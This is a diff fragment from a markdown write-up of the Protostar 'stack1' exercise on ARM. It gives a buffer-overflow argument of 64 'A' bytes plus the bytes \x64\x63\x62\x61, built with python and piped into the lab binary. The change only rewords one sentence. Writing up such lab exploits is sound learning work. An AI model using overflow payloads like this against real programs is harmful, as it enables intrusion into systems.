S0x12c/write-ups/Protostar/ARM_stack1.md

 Now we can create our argument with `$ python -c "print 64 * 'A' + r'\x64\x63\x62\x61'"` command.

-To run the binary, we need to pipe this argument with `$ printf "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x64\x63\x62\x61" | xargs ./stack1`.
+We will use the command `$ printf "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x64\x63\x62\x61" | xargs ./stack1` to pipe this argument into our binary.
 ![alt text](img/ARM_stack1_11.png)